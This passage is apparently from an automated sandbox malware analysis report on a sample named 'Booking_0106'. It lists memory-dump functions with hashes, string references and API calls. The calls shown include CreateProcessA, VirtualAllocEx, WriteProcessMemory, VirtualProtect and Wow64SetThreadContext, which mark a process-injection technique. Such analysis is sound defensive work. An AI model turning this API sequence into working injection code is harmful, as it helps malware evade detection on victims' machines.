(bq, xrefs: 059E796C
d, xrefs: 059E7BB9

Memory Dump Source

Source File: 00000000.00000002.1732028108.00000000059E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_59e0000_Booking_0106.jbxd

Similarity

API ID:
String ID: (bq$d
API String ID: 0-3334038649
Opcode ID: 5ddb29265cf0f90b2d70097469861fde338af704880065f3e46b5febfe523d24
Instruction ID: 595ee0e231485c431f18019a0586a542152d9fd4997e33e23e37fd59b11dc45e
Opcode Fuzzy Hash: 5ddb29265cf0f90b2d70097469861fde338af704880065f3e46b5febfe523d24
Instruction Fuzzy Hash: F0D17934600606CFCB25CF68C48496AB7F6FF88320B65C969E45A9B765DB30FC42CB91

Function 059E6388 Relevance: 2.7, Strings: 2, Instructions: 180
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(bq, xrefs: 059E6503
(bq, xrefs: 059E64AC

Memory Dump Source

Source File: 00000000.00000002.1732028108.00000000059E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_59e0000_Booking_0106.jbxd

Similarity

API ID:
String ID: (bq$(bq
API String ID: 0-4224401849
Opcode ID: 69a74d7cb17dff25f5d00cd805754cff2ce2cc69652058665541c6828b757511
Instruction ID: 60fcbf2e061a6597eeaba54746314a270ab1cc2b9c3c9a57caf69979bbaff09b
Opcode Fuzzy Hash: 69a74d7cb17dff25f5d00cd805754cff2ce2cc69652058665541c6828b757511
Instruction Fuzzy Hash: 2D51BA313002058FCB16DF29E894BAE7BA6FF94310F208169E8068B3A5DF35DC46CB90

Function 059E3DD8 Relevance: 2.7, Strings: 2, Instructions: 152COMMON

Download Yara Rule

Strings

(bq, xrefs: 059E3EDE
Hbq, xrefs: 059E3F6D

Memory Dump Source

Source File: 00000000.00000002.1732028108.00000000059E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_59e0000_Booking_0106.jbxd

Similarity

API ID:
String ID: (bq$Hbq
API String ID: 0-4081012451
Opcode ID: a1a3f5f6e6939bd2668f56849e9cc2fa3918c9f3b313c51b8d934bd4dbbac23a
Instruction ID: 5905ffd63389bfd2c9f03bae79c02c2eeaa19c2123ed80b29fb6b1da3f910558
Opcode Fuzzy Hash: a1a3f5f6e6939bd2668f56849e9cc2fa3918c9f3b313c51b8d934bd4dbbac23a
Instruction Fuzzy Hash: 515136347106058FC71AAF78C46492EBBB7FF95201B60896DE4068B3A1CF35EC0ACB91

Function 059E05A0 Relevance: 2.6, Strings: 2, Instructions: 145COMMON

Download Yara Rule

Strings

(bq, xrefs: 059E06D8
Hbq, xrefs: 059E0704

Memory Dump Source

Source File: 00000000.00000002.1732028108.00000000059E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_59e0000_Booking_0106.jbxd

Similarity

API ID:
String ID: (bq$Hbq
API String ID: 0-4081012451
Opcode ID: 091ec7f522d41b4f030ace89e358a69b3ec4b6f1a48d49616b7eaf84eb4cf56b
Instruction ID: 4bb3e5f22b05720ed86c1fe534a4fe42a40fefbf827d3addb8cccdd0a48b36f9
Opcode Fuzzy Hash: 091ec7f522d41b4f030ace89e358a69b3ec4b6f1a48d49616b7eaf84eb4cf56b
Instruction Fuzzy Hash: 4051DF302047018FD726DF3AC59472ABAE6FF85310F108A2DD05A8B7A5DBB4E8498B51

Function 01431EC0 Relevance: 2.6, Strings: 2, Instructions: 125COMMON

Download Yara Rule

Strings

Nk, xrefs: 01431F3F
, xrefs: 01431FD2

Memory Dump Source

Source File: 00000000.00000002.1711144407.0000000001430000.00000040.00000800.00020000.00000000.sdmp, Offset: 01430000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1430000_Booking_0106.jbxd

Similarity

API ID:
String ID: $Nk
API String ID: 0-3487173116
Opcode ID: 6c7ecf57980ebb05cc65e24a05af27d200f7b86862e533094ca1a3a2425ebb63
Instruction ID: 15457b8bda344defed8d21b278aa3a610776a691313a7166baf685947f96e242
Opcode Fuzzy Hash: 6c7ecf57980ebb05cc65e24a05af27d200f7b86862e533094ca1a3a2425ebb63
Instruction Fuzzy Hash: 2741AB71F0010A8FDB10CF99D8809AEF7B2FBC8611B24C52AD614D7729D331A956CB91

Function 059E9561 Relevance: 2.6, Strings: 2, Instructions: 124COMMON

Download Yara Rule

Strings

pbq, xrefs: 059E96C7
4'^q, xrefs: 059E95F4

Memory Dump Source

Source File: 00000000.00000002.1732028108.00000000059E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_59e0000_Booking_0106.jbxd

Similarity

API ID:
String ID: 4'^q$pbq
API String ID: 0-3872760177
Opcode ID: 67517ba71623f029bf83c2ad1e49b7c602d055c3a913f69c927524b1f26425aa
Instruction ID: 82574dd919c4c2cce6e7908604223dfc2dea165e26c86dbbef458b6dfe34b5b3
Opcode Fuzzy Hash: 67517ba71623f029bf83c2ad1e49b7c602d055c3a913f69c927524b1f26425aa
Instruction Fuzzy Hash: E0419031A403099FC705DF68C540AAEBBF7FB89300F548929C4099B369DB71ED4A8B91

Function 0595CBF8 Relevance: 2.5, Strings: 2, Instructions: 16COMMON

Download Yara Rule

Strings

], xrefs: 0595CC00
_, xrefs: 0595CC30

Memory Dump Source

Source File: 00000000.00000002.1731779788.0000000005950000.00000040.00000800.00020000.00000000.sdmp, Offset: 05950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5950000_Booking_0106.jbxd

Similarity

API ID:
String ID: ]$_
API String ID: 0-2434386226
Opcode ID: 4e30e132c4df337e71a5bf9d0abde67e38c88698ccb382b8d11443f3ca8883a8
Instruction ID: af5b2db3f111e71e843bcd6e3f13d66e3dc044a1e99cbdeb25a85a5fdad785c4
Opcode Fuzzy Hash: 4e30e132c4df337e71a5bf9d0abde67e38c88698ccb382b8d11443f3ca8883a8
Instruction Fuzzy Hash: E9E0ED70905658DFDF60CF68D8887AE77B1FB06315F5104D9D54D92140DB744BD88F16

Function 059EAE40 Relevance: 1.9, Strings: 1, Instructions: 677COMMON

Download Yara Rule

Strings

,bq, xrefs: 059EB1BB

Memory Dump Source

Source File: 00000000.00000002.1732028108.00000000059E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_59e0000_Booking_0106.jbxd

Similarity

API ID:
String ID: ,bq
API String ID: 0-2474004448
Opcode ID: 19446502aa277156e4024d475ed68110002c17a01805962c1cbc01e1f23eabcf
Instruction ID: 5b644a35b0a616514e4047671c58acebfb0a11992525f84da595e447ab65ae27
Opcode Fuzzy Hash: 19446502aa277156e4024d475ed68110002c17a01805962c1cbc01e1f23eabcf
Instruction Fuzzy Hash: 98521875A102288FDB25CF69C981BEDBBF6BF88300F1581D9E509A7391DA309D84CF61

Function 059E5380 Relevance: 1.8, Strings: 1, Instructions: 534COMMON

Download Yara Rule

Strings

(_^q, xrefs: 059E5610

Memory Dump Source

Source File: 00000000.00000002.1732028108.00000000059E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_59e0000_Booking_0106.jbxd

Similarity

API ID:
String ID: (_^q
API String ID: 0-538443824
Opcode ID: e7366105a42d1cde38afd440cdc8bdcf57ebef8c83bcfc892e5fe79abf2d739d
Instruction ID: fe5972875b15dde214b11cdb408b2011e253808c3457e7783a40f405a6a54178
Opcode Fuzzy Hash: e7366105a42d1cde38afd440cdc8bdcf57ebef8c83bcfc892e5fe79abf2d739d
Instruction Fuzzy Hash: FB22BA35A102049FCB05DFA8C494AADBBF6FF88714F158569E806EB3A5DB71EC44CB90

Function 05A2043D Relevance: 1.8, APIs: 1, Instructions: 264processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 05A206AF

Memory Dump Source

Source File: 00000000.00000002.1732195677.0000000005A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5a20000_Booking_0106.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 6329acaf46c8ffe4d05c143d4cb973690f68453e667742660ca189157fda16fa
Instruction ID: 83188432d69056b9c41e4e3ad263adaf0de3cdfc1d86705f1d9d531d499323e3
Opcode Fuzzy Hash: 6329acaf46c8ffe4d05c143d4cb973690f68453e667742660ca189157fda16fa
Instruction Fuzzy Hash: 14A102B0D00228DFDF10CFA9C88ABEDBBB1BB49304F149169E859A7250DB749985CF95

Function 05A20448 Relevance: 1.8, APIs: 1, Instructions: 261processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 05A206AF

Memory Dump Source

Source File: 00000000.00000002.1732195677.0000000005A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5a20000_Booking_0106.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: aa1d7004058a920a11fb9652f92fd6e4f8e4ded18d5a751dfbd21385cac4d31a
Instruction ID: 894eb5675d3e10885a2c104229c2595cf366048b400ce09aa422e5413b19bb12
Opcode Fuzzy Hash: aa1d7004058a920a11fb9652f92fd6e4f8e4ded18d5a751dfbd21385cac4d31a
Instruction Fuzzy Hash: 2AA102B0D00228DFDF10CFA9C88ABEDBBB1BB49300F149169E859A7250DB749985CF95

Function 05A20EB9 Relevance: 1.6, APIs: 1, Instructions: 118injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 05A20F93

Memory Dump Source

Source File: 00000000.00000002.1732195677.0000000005A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5a20000_Booking_0106.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: b46e3f414d56274bd812624441868beb4fd1ac7de6c57d2fc1d4287f55b88e62
Instruction ID: 248a23c946155575e6fa929b57ba029440d7d57a1445909fa873f2be39acc1da
Opcode Fuzzy Hash: b46e3f414d56274bd812624441868beb4fd1ac7de6c57d2fc1d4287f55b88e62
Instruction Fuzzy Hash: 05419AB5D052589FCF00CFA9D984ADEFBF1BB49310F24942AE819B7210D734AA45CF68

Function 05A20EC0 Relevance: 1.6, APIs: 1, Instructions: 116injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 05A20F93

Memory Dump Source

Source File: 00000000.00000002.1732195677.0000000005A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5a20000_Booking_0106.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 06a3aded7228e91c262bbc2454432f3db06f723c367b14ac7df9e24b7a3ce890
Instruction ID: 2f694af9a41ed626ec4b9a76f9e1c2f05891847bcbeff6a2c8927c28ed1094c5
Opcode Fuzzy Hash: 06a3aded7228e91c262bbc2454432f3db06f723c367b14ac7df9e24b7a3ce890
Instruction Fuzzy Hash: 8A41ACB5D052589FCF00CFA9D984ADEFBF1BB49310F24902AE819B7210D734AA45CF68

Function 05A20D59 Relevance: 1.6, APIs: 1, Instructions: 103memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 05A20E0A

Memory Dump Source

Source File: 00000000.00000002.1732195677.0000000005A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5a20000_Booking_0106.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: c6aa70ddb9f3ca112b6ec2e26c11c5fd2d5bdd7482583d2bb462e3a139f167b5
Instruction ID: b891b2cf1069dd6745b61f0efbff5a8a09df451091d5f68e03ade3fce098c4ff
Opcode Fuzzy Hash: c6aa70ddb9f3ca112b6ec2e26c11c5fd2d5bdd7482583d2bb462e3a139f167b5
Instruction Fuzzy Hash: ED3196B9D002589FCF10CFA9D985ADEFBB1BB49320F14942AE815BB210D735A945CF68

Function 05A20D60 Relevance: 1.6, APIs: 1, Instructions: 101memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 05A20E0A

Memory Dump Source

Source File: 00000000.00000002.1732195677.0000000005A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5a20000_Booking_0106.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 6f846b92a86692568a70478171a19651960112efc234437fd329fe269ac7930b
Instruction ID: ccdd9fce787c0c0a71783cfc9cbe7b2a25882130ff9c9745fb784edeed4fa985
Opcode Fuzzy Hash: 6f846b92a86692568a70478171a19651960112efc234437fd329fe269ac7930b
Instruction Fuzzy Hash: D93185B9D042589FCF10CFA9D985ADEFBB1BB49310F10942AE815BB210D735A945CF68

Function 05A213A8 Relevance: 1.6, APIs: 1, Instructions: 101memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 05A21454

Memory Dump Source

Source File: 00000000.00000002.1732195677.0000000005A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5a20000_Booking_0106.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 76182a362ec71fd28ea6dd35c9889af77658112c6313d6e44a3ae457c5a52ea6
Instruction ID: 906988ebf936c498815466dd23808446126b6c281c752f1876fd50d80e78f176
Opcode Fuzzy Hash: 76182a362ec71fd28ea6dd35c9889af77658112c6313d6e44a3ae457c5a52ea6
Instruction Fuzzy Hash: 2F31CBB5D002589FCF10CFAAD981AEEFBB1BB49310F14902AE815B7210D735A945CF68

Function 05A213B0 Relevance: 1.6, APIs: 1, Instructions: 98memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 05A21454

Memory Dump Source

Source File: 00000000.00000002.1732195677.0000000005A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5a20000_Booking_0106.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 868271921e4e8a4d2e5888c9d8770d2b25fe9129b0fe674d7c2bfc756a964fb5
Instruction ID: 514090c519a4a362a51283e1d5477439ef788a9701bc5646edd69610f250113e
Opcode Fuzzy Hash: 868271921e4e8a4d2e5888c9d8770d2b25fe9129b0fe674d7c2bfc756a964fb5
Instruction Fuzzy Hash: 4731AAB5D04258DFCF10CFAAD584AEEFBB1BB49310F14942AE819B7210D735A945CF58

Function 059FD9F0 Relevance: 1.6, APIs: 1, Instructions: 96memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 059FDA94

Memory Dump Source

Source File: 00000000.00000002.1732067452.00000000059F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_59f0000_Booking_0106.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 813106dadf81550e8ff40e41797bd956dc8078b4e3666c37721c5e86e27ab283
Instruction ID: bc3276d345ebb1e8f8f9308a1e1010ebdc60a0929a9f61ff5e3d5657cee658f7
Opcode Fuzzy Hash: 813106dadf81550e8ff40e41797bd956dc8078b4e3666c37721c5e86e27ab283
Instruction Fuzzy Hash: 0A3197B4D052589FCF10CFA9D980ADEFBB1BB49310F24942AE815B7210D735A945CF68

Function 05A207F8 Relevance: 1.6, APIs: 1, Instructions: 94threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,?), ref: 05A208AF

Memory Dump Source

Source File: 00000000.00000002.1732195677.0000000005A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5a20000_Booking_0106.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: e2a959f3397bc2674dfe2907a3ed4ff7b4f2ca924f1e979f2613612712792a7a
Instruction ID: 3f5634f5ebe0d0421a5f128ee6ce7c266fb95a8bbfdf182ea347e47dedaa8f75
Opcode Fuzzy Hash: e2a959f3397bc2674dfe2907a3ed4ff7b4f2ca924f1e979f2613612712792a7a
Instruction Fuzzy Hash: 9641CBB5D00258DFCB10CFA9D585AEEBFF1BB48310F24802AE459B7250C738A985CF94

Function 05A20800 Relevance: 1.6, APIs: 1, Instructions: 94threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,?), ref: 05A208AF

Memory Dump Source

Source File: 00000000.00000002.1732195677.0000000005A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5a20000_Booking_0106.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 559b1f51ba6f1bb8a50ca1aeb766162a4d95c5cbe8acfdf4e166c7351268bc6e
Instruction ID: ee737a2dd0febe40878176d9b0cae63862a39c4ef5441cf07f1afd18e17f1004
Opcode Fuzzy Hash: 559b1f51ba6f1bb8a50ca1aeb766162a4d95c5cbe8acfdf4e166c7351268bc6e
Instruction Fuzzy Hash: EF31BBB5D012589FCB10CFA9D885AEEFFF1BB49310F24802AE415B7250C738A985CF94

Function 059E5B08 Relevance: 1.5, Strings: 1, Instructions: 249COMMON

Download Yara Rule

Strings

Pl^q, xrefs: 059E5CF0

Memory Dump Source

Source File: 00000000.00000002.1732028108.00000000059E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_59e0000_Booking_0106.jbxd

Similarity

API ID:
String ID: Pl^q
API String ID: 0-2831078282
Opcode ID: c5c68896e3be9375d3dbbc0f8bf3240c264c354113d1d56ce25d40e32535d3ff
Instruction ID: fb8f407a6589a30782c0c39bc21fd7c11342aea7d6281cb5542e4f77f3e3e181
Opcode Fuzzy Hash: c5c68896e3be9375d3dbbc0f8bf3240c264c354113d1d56ce25d40e32535d3ff
Instruction Fuzzy Hash: 7C9124307001088FCB15DF28C494AAE7BFABF89714B1544A9E506DB3B5DB71EC42CBA1

Function 059E9F58 Relevance: 1.5, Strings: 1, Instructions: 225COMMON

Download Yara Rule

Strings

4'^q, xrefs: 059EA182

Memory Dump Source

Source File: 00000000.00000002.1732028108.00000000059E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_59e0000_Booking_0106.jbxd

Similarity

API ID:
String ID: 4'^q
API String ID: 0-1614139903
Opcode ID: 1c9f726c607170920e889fb84cda4b0c09e40ff3372a6e9bffcc03eda52c2536
Instruction ID: 782923eca59b6132b1586b99c39406bd786da091d714c8a7e915a39141b3ac98
Opcode Fuzzy Hash: 1c9f726c607170920e889fb84cda4b0c09e40ff3372a6e9bffcc03eda52c2536
Instruction Fuzzy Hash: D4A1D834A10218DFCB05EFA4D998AADBBB6FF89300F558159E406AB365DB31EC46CF50

Function 01430868 Relevance: 1.4, Strings: 1, Instructions: 166COMMON

Download Yara Rule

Strings

Te^q, xrefs: 014309FA

Memory Dump Source

Source File: 00000000.00000002.1711144407.0000000001430000.00000040.00000800.00020000.00000000.sdmp, Offset: 01430000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1430000_Booking_0106.jbxd

Similarity

API ID:
String ID: Te^q
API String ID: 0-671973202
Opcode ID: bb740026d7b2e863fdf05f1e227d12eddb94542d6b13a50beada3c96a69afccc
Instruction ID: 9529809e07e2201400abad369139a66d664c27a3f539dab20770fc60c1047fdf
Opcode Fuzzy Hash: bb740026d7b2e863fdf05f1e227d12eddb94542d6b13a50beada3c96a69afccc
Instruction Fuzzy Hash: 8251F430B102198FDB58EF79D418A7E7AE7BFD8600B14456DE406DB3A5DE71CC028781

Function 059E0B50 Relevance: 1.4, Strings: 1, Instructions: 161COMMON

Download Yara Rule

Strings

(bq, xrefs: 059E0BC4

Memory Dump Source

Source File: 00000000.00000002.1732028108.00000000059E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_59e0000_Booking_0106.jbxd

Similarity

API ID:
String ID: (bq
API String ID: 0-149360118
Opcode ID: c983b4425c4e304fde5d42b603dad22e580f5bfdcf780c332b596cd453be8d63
Instruction ID: 938e9166d52ddb394b39d43104ddd605f8f18210b3043d6086b2f80095b2df76
Opcode Fuzzy Hash: c983b4425c4e304fde5d42b603dad22e580f5bfdcf780c332b596cd453be8d63
Instruction Fuzzy Hash: F051D035A006168FCB00CF59C484A6AF7F5FF89320F658665E919AB341D730F852CBD4

Function 059E1A30 Relevance: 1.4, Strings: 1, Instructions: 159COMMON

Download Yara Rule

Strings

,bq, xrefs: 059E1A93

Memory Dump Source

Source File: 00000000.00000002.1732028108.00000000059E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_59e0000_Booking_0106.jbxd

Similarity

API ID:
String ID: ,bq
API String ID: 0-2474004448
Opcode ID: 4ef3ccce8ef48997690a5ab8bec5b98d9480f47b18861d8a861be22f26f1adff
Instruction ID: 3ff47b1f2dce01e8bd0e6050474670eef1fb12561b6cbbd313b851628fb7a60f
Opcode Fuzzy Hash: 4ef3ccce8ef48997690a5ab8bec5b98d9480f47b18861d8a861be22f26f1adff
Instruction Fuzzy Hash: 9751BE357001058FCB05DF69D894AAEBBE6FF89311B2581AAE906DF365DB31EC01CB91

Function 05C7FDF0 Relevance: 1.4, Strings: 1, Instructions: 150COMMON

Download Yara Rule

Strings

pbq, xrefs: 05C7FEA0

Memory Dump Source

Source File: 00000000.00000002.1732699313.0000000005C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c60000_Booking_0106.jbxd

Similarity

API ID:
String ID: pbq
API String ID: 0-3896149868
Opcode ID: 0e406f5d4587159e70eba1006256c389cf1f031c4fd2123ba5843b76b028beef
Instruction ID: 3fca7249613ba30e7c36d56da4f3b904492e8a7df4851d4c993d2997fab31cd1
Opcode Fuzzy Hash: 0e406f5d4587159e70eba1006256c389cf1f031c4fd2123ba5843b76b028beef
Instruction Fuzzy Hash: C1515D76600104AFCB45DFA8C954D69BBF3FF8C31071684A8E2099B376DA32DC22EB51

Function 059EEC58 Relevance: 1.4, Strings: 1, Instructions: 145COMMON

Download Yara Rule

Strings

(bq, xrefs: 059EED84

Memory Dump Source

Source File: 00000000.00000002.1732028108.00000000059E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_59e0000_Booking_0106.jbxd

Similarity

API ID:
String ID: (bq
API String ID: 0-149360118
Opcode ID: bf0a20e1e81b51327bc888bccbb7b7dfefe95adf821504452d0c0faaf1d0a8de
Instruction ID: 7b7baf5971247e1ed90a06dcadb7b79e830afaaa62891e5cbbe2a72a1ebc36da
Opcode Fuzzy Hash: bf0a20e1e81b51327bc888bccbb7b7dfefe95adf821504452d0c0faaf1d0a8de
Instruction Fuzzy Hash: 00415E36714214AFCB069F69D814E597BBAFF89320B1580A5E209CB3B2CB36DC11EB55

Function 01430BA1 Relevance: 1.4, Strings: 1, Instructions: 145COMMON

Download Yara Rule

Strings

\s^q, xrefs: 01430D23

Memory Dump Source

Source File: 00000000.00000002.1711144407.0000000001430000.00000040.00000800.00020000.00000000.sdmp, Offset: 01430000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1430000_Booking_0106.jbxd

Similarity

API ID:
String ID: \s^q
API String ID: 0-4111632511
Opcode ID: da854467a703b9f34f35d435b5e17a757b3b6cb456763444898c6bb83ca94560
Instruction ID: ef55cc4b63f576aaac1d6bd4b49fd63aa15a027c29fe602a015f4624f4fd82e8
Opcode Fuzzy Hash: da854467a703b9f34f35d435b5e17a757b3b6cb456763444898c6bb83ca94560
Instruction Fuzzy Hash: D1511B78D4020E9FDF04CFA9D944AEEBBF1BF88310F10A665D406EB265DB319946CB50

Function 059EDBF8 Relevance: 1.4, Strings: 1, Instructions: 139COMMON

Download Yara Rule

Strings

4'^q, xrefs: 059EDC42

Memory Dump Source

Source File: 00000000.00000002.1732028108.00000000059E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_59e0000_Booking_0106.jbxd

Similarity

API ID:
String ID: 4'^q
API String ID: 0-1614139903
Opcode ID: f7748345a9a5e2d4537294e7654c1ce2cb73247b4b3d73504de5ff93de36f1c2
Instruction ID: b1fac6781bd86727499ca245c915f2f2862e33608c9c752f5ce9e66e3f70a86f
Opcode Fuzzy Hash: f7748345a9a5e2d4537294e7654c1ce2cb73247b4b3d73504de5ff93de36f1c2
Instruction Fuzzy Hash: 02416670B106189FCB15EB68C498AAEB7FBAFC9600F14451DE4079B3A4DF74AC46CB91

Function 0143C4F8 Relevance: 1.4, Strings: 1, Instructions: 128COMMON

Download Yara Rule

Strings

TJcq, xrefs: 0143C5E3

Memory Dump Source

Source File: 00000000.00000002.1711144407.0000000001430000.00000040.00000800.00020000.00000000.sdmp, Offset: 01430000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1430000_Booking_0106.jbxd

Similarity

API ID:
String ID: TJcq
API String ID: 0-1911830065
Opcode ID: 1001cd55068182d5aa8801da58a21a03fe427a540dedcb371dfdaeb682ca1496
Instruction ID: 026e8960ff10baf75e6fba0c0523a346a8d6f5e4e0b1fcf0c2c3dd496e29bb14
Opcode Fuzzy Hash: 1001cd55068182d5aa8801da58a21a03fe427a540dedcb371dfdaeb682ca1496
Instruction Fuzzy Hash: 8151C178D01218DFDB14DFA9E4886AEBBF2FF98311F10802AE416A73A4DB345A45CF51

Function 0143C508 Relevance: 1.4, Strings: 1, Instructions: 125COMMON

Download Yara Rule

Strings

TJcq, xrefs: 0143C5E3

Memory Dump Source

Source File: 00000000.00000002.1711144407.0000000001430000.00000040.00000800.00020000.00000000.sdmp, Offset: 01430000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1430000_Booking_0106.jbxd

Similarity

API ID:
String ID: TJcq
API String ID: 0-1911830065
Opcode ID: 056e28eac80a383de068ac59077d7040f0a719d30b9a8c3f21c26b1b98206cd7
Instruction ID: 50e444b558dc8e52925959454cab56edc07820e03dd76aa9ba375597fdeeb45f
Opcode Fuzzy Hash: 056e28eac80a383de068ac59077d7040f0a719d30b9a8c3f21c26b1b98206cd7
Instruction Fuzzy Hash: AF51AF74D01218DFDB14DFA9E588AAEBBF2BF9C301F10802AE416A73A4DB345A45CF51

Function 059E8FD1 Relevance: 1.4, Strings: 1, Instructions: 113COMMON

Download Yara Rule

Strings

4'^q, xrefs: 059E9019

Memory Dump Source

Source File: 00000000.00000002.1732028108.00000000059E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_59e0000_Booking_0106.jbxd

Similarity

API ID:
String ID: 4'^q
API String ID: 0-1614139903
Opcode ID: b815a50d55a9e28ed0cf995da4cbba6444557125fb5af5ce3878ec0ee99af024
Instruction ID: 5fd4cf29f15f9438af431119a7b7417cda3e30cecabcd8acf93c2b5ac397a922
Opcode Fuzzy Hash: b815a50d55a9e28ed0cf995da4cbba6444557125fb5af5ce3878ec0ee99af024
Instruction Fuzzy Hash: DE316E357002089FCF15DF69D998D5ABBA7FF88320B158469E60A9B375CB31DC46CB90

Function 059E0448 Relevance: 1.3, Strings: 1, Instructions: 97COMMON

Download Yara Rule

Strings

(bq, xrefs: 059E0498

Memory Dump Source

Source File: 00000000.00000002.1732028108.00000000059E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_59e0000_Booking_0106.jbxd

Similarity

API ID:
String ID: (bq
API String ID: 0-149360118
Opcode ID: 07386208fed27eedf413e0cb16b0661ce256bcccd545d47d91065595fa0b4e6a
Instruction ID: 9c0e9bbb70024d27b8a8b08349fbbb2e36fdf102d29497080225741a9b44c141
Opcode Fuzzy Hash: 07386208fed27eedf413e0cb16b0661ce256bcccd545d47d91065595fa0b4e6a
Instruction Fuzzy Hash: E621D036304212AFDB159F6AD844A6E7BABEBC9320B64803AF909CB350DE718C11C790

